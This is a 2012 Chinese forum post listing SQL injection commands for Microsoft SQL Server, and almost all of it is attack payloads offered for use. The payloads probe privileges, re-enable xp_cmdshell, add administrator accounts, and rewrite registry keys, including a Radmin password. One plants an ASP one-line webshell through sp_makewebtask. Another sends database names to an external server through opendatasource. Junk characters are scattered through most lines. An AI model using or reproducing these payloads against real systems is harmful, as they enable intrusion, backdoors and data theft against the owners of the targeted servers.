找回密码
 立即注册
查看: 2153|回复: 0
打印 上一主题 下一主题

阿D常用的一些注入命令

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:26:30 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
阿D常用的一些注入命令
5 e) M6 m5 L& Q$ Q! d//看看是什么权限的7 ^! G3 q6 a2 N- T, ?9 L: x/ `
and 1=(Select IS_MEMBER('db_owner'))4 q5 [: s1 o6 J" o: ]/ _
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--) l# Z, D/ `- j# N# h; Q
( {3 X& |  d) |: |
//检测是否有读取某数据库的权限
3 E7 M3 ^0 ]4 vand 1= (Select HAS_DBACCESS('master'))
3 v+ ]3 d3 f- _; k: i( N% @And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
. i8 U! i( K3 e' w. n% W) t1 [
: P! i8 R% Y7 U' `2 ?* B, A8 e
  U2 j9 `: g) ?, r- N3 q$ n数字类型' A* Z+ ^; d. ~$ `2 F3 D
and char(124)%2Buser%2Bchar(124)=0( O, J+ C! q, k5 M) c; T
; f7 |! g+ c- \
字符类型
; d& U9 v+ R+ f$ Y2 Z6 n/ m  Z' and char(124)%2Buser%2Bchar(124)=0 and ''='9 P# Y; U5 S8 s* w6 ^

* I) Q5 u& b1 T6 f4 r7 ]# {搜索类型
6 Z# h6 P0 m$ S+ }, [1 |  F& @' and char(124)%2Buser%2Bchar(124)=0 and '%'='
7 G( k3 [$ r' A8 ^# V
. x5 C. i% \& k' W. D爆用户名
) F" q7 N, b2 x8 oand user>0
' A/ G+ o3 R& E' and user>0 and ''='
/ y/ _" @/ `  V- I# l( t1 k. f: k: z" J6 q* n" n
检测是否为SA权限
; S' M# G5 @* p1 q: p+ h  h: @and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
$ m+ q) F/ a+ b: Q4 y2 q# RAnd char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
+ z5 h) l' D8 g& f, J4 t4 `+ R
' U, J' m$ Z* W. ~检测是不是MSSQL数据库
* j, c2 x! L/ \* pand exists (select * from sysobjects);--
/ ]2 ~  p$ |/ H' r4 {5 f: N+ ^. t1 {
1 V! \2 _! t- e+ E. F& Y检测是否支持多行+ D8 G$ q, k) A' ^
;declare @d int;-- # A1 ?* }$ r7 G5 U8 G) n
1 `! i5 m5 a' [4 k, T
恢复 xp_cmdshell
7 o3 y0 s9 A. T: ~;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
7 R8 `2 F2 j5 c8 Y6 J( M6 {' O" C& X3 P- ]7 T& R) n" k: y
6 [+ S0 S! H8 _7 e. m
select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version') . m( Q; H5 K  O) x7 V4 p( p

9 o. v; J4 z' I4 d5 U//-----------------------
' r- v" ^2 @+ o/ p* f1 I//      执行命令. ~) j; s; E0 b3 Z9 k: ]) I
//-----------------------
; M6 k, b1 x+ {& v/ t0 G4 g/ E3 O+ l6 q首先开启沙盘模式:  B! h  J% Y3 r; ~! l  I" Z
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1- J7 f! ~& T7 Q

- w) C! d; }& G8 J$ k" I+ ?然后利用jet.oledb执行系统命令
9 o* v1 Z6 T! u6 Z3 ?select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")'), f, E4 B% e0 s* a& I
* q7 c" ?2 r+ R' {6 D
执行命令% B) w; R$ i5 l9 R9 O) I
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--: D0 A- Y- r+ M' m6 {6 R% e9 _
* t* W% [* G+ c% ^
EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
6 [0 j6 H- n( s' n
' q- a; Q  O% M4 H+ t3 c$ j判断xp_cmdshell扩展存储过程是否存在:* r5 d( ^/ t- ?' Q
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')
8 a/ C+ G( J) ?0 C7 V0 Y6 }' v. q* f  T
写注册表
, B/ [6 C* b. k) V) f1 `8 H% R; ]exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
7 a7 H; ]& _/ O4 c" ^7 ], H
/ J) w4 ^$ e( g) eREG_SZ5 Q& y  [8 {, e

/ v, w/ L) n5 q读注册表
+ e( }0 g9 u3 U$ r. s; X& R5 Wexec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
6 m. n0 y3 l; L; x5 ^5 R/ V" A' W) X5 S1 s9 j) a9 c
读取目录内容  C# U# K  ?/ [1 @
exec master..xp_dirtree 'c:\winnt\system32\',1,1. K3 c/ A1 z4 \9 s5 L
6 @9 N7 G5 q1 B0 W9 d; I3 \

  x" t$ B) S$ I% H- L数据库备份& n! ^  l( m0 _5 f" Q
backup database pubs to disk = 'c:\123.bak'/ z, i: c& w9 V( V  f) h: w  k

0 @2 ]# L* P& C% ]% z//爆出长度
8 e0 d* b7 x, t% Y: D1 KAnd (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--' {8 N- u8 [) O; r

0 X& A- L  Q, U% C2 h
8 ^. g3 ^+ l5 ]8 {1 i) u1 d0 X* R) R1 g$ w5 ?+ t4 z4 R
更改sa口令方法:用sql综合利用工具连接后,执行命令:
: I9 c& @5 X2 D; y8 U2 Fexec sp_password NULL,'新密码','sa'
: L0 t9 e8 e9 c; {6 j4 V% r0 j. T* K
4 U3 g# X4 s+ m2 r添加和删除一个SA权限的用户test:
; ~3 I8 r4 n7 p$ [exec master.dbo.sp_addlogin test,ptlove
0 `; y1 r: M8 L( Kexec master.dbo.sp_addsrvrolemember test,sysadmin+ X  p4 C/ o$ z
1 `5 h4 v- s+ n' M) X  [
删除扩展存储过过程xp_cmdshell的语句: ! d* W( k  a$ I. I: {
exec sp_dropextendedproc 'xp_cmdshell'4 W$ o' M! v) ?3 n

1 M! q1 }. G" ]% u, |9 {) E' v添加扩展存储过过程
5 G) P0 r: |9 x$ K# VEXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll' ; S4 x: C  M" i- L5 x4 y
GRANT exec On xp_proxiedadata TO public . E# R/ I; A; j! j
) G. V" }/ Q5 e

+ A$ z' e% Z: M' V8 f  e停掉或激活某个服务。
& i) w" W, [! ]0 h* A7 K5 S9 ~* z# P% k: r9 }% \0 [" c
exec master..xp_servicecontrol 'stop','schedule'
8 s" U9 _0 `: U+ j1 F8 u5 X- D9 g  kexec master..xp_servicecontrol 'start','schedule'- a! e8 Q& \+ v4 K

; C  f: x5 o8 ~dbo.xp_subdirs, \; N0 C$ G1 D1 T: X( k

0 r* Y2 B8 Y6 i9 n+ T只列某个目录下的子目录。+ |5 l  h+ v) [! d3 m3 ]- \
xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'3 ^# f: d' a& k9 s! |" y6 n
7 ?7 s" H0 M' \2 ]$ h4 U
dbo.xp_makecab
( B* r4 Q: E, `) c# V  g$ Y; f' H( P, d* B, ]" q+ w
将目标多个档案压缩到某个目标档案之内。
! d. M4 x8 C6 H* F) A$ e所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。7 u' B/ z1 i9 w
6 m) O! [, Z7 m& n5 D% j
dbo.xp_makecab  K' @( {. J9 j4 p  P
'c:\test.cab','mszip',1,
2 p2 W$ j8 `+ i5 V9 ~'C:\Inetpub\wwwroot\SQLInject\login.asp',9 k& m8 x8 Z# i$ c* B
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'
! _. e. \: [! c- a
% r' ~* f1 |% t' O, m& q' H% g4 m0 qxp_terminate_process. _* q; Z8 E! j$ X* \

* O% `5 r/ F' b. J+ I停掉某个执行中的程序,但赋予的参数是 Process ID。
# G. {0 }4 H; N) S: Q& |利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID
/ Z0 u9 G3 R4 x* V7 h0 @
  Y8 [1 a1 E* K5 g6 M. Jxp_terminate_process 2484* K5 X9 q; |! C$ D) t& Z
) c5 |3 V, n. E" |0 a4 d
xp_unpackcab
) {0 y, U+ H- T8 D2 t. D% O- R6 j: o* ]7 D% P0 \
解开压缩档。1 m2 @9 c4 T1 \' r& S8 T
1 X& X" ?8 S0 ^5 p4 T+ V+ \
xp_unpackcab 'c:\test.cab','c:\temp',1
, h8 E: v, M% Y, @8 `7 t; j$ Z- g; U! W/ }7 U* j
6 V3 {. K! F/ u  `2 M' y) E* n
某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
  m" w+ J/ N  I- C
% e2 V) ^3 ?7 l! n1 jcreate database lcx;" N( i4 k# G$ o: u& u6 g& J
Create TABLE ku(name nvarchar(256) null);2 i/ c( g0 T/ Y: m' P
Create TABLE biao(id int NULL,name nvarchar(256) null);/ s! W2 x& o, O. H4 p# q1 @) J
3 w0 A0 e" y+ m$ {& a) e& F
//得到数据库名! C5 z$ w. M0 b$ r6 p) G; P
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases% d% c  q2 o5 d5 \
4 {4 Z$ f9 s4 p/ @, y! r
& P1 r2 Y- h* p# b/ I
//在Master中创建表,看看权限怎样3 m1 y* \. e+ ~! n# l
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--3 I5 r8 W% t( X3 z

, c9 B0 d6 E: i- ?) X用 sp_makewebtask直接在web目录里写入一句话马:% Y- v; l" k8 L- }- p) E, c
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--  s! B, r4 E8 H3 Z. G2 p3 v1 z* t

* c2 l1 J7 o( l9 `+ {4 e//更新表内容
8 I: N! z  G2 O8 L5 N: }) M" gUpdate films SET kind = 'Dramatic' Where id = 123; A- T$ o% G! F$ [3 P8 P3 c
- Z. J1 F5 z, X5 o  d' e) w# ]
//删除内容; c& F5 h0 O$ H# U3 c
delete from table_name where Stockid = 3
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表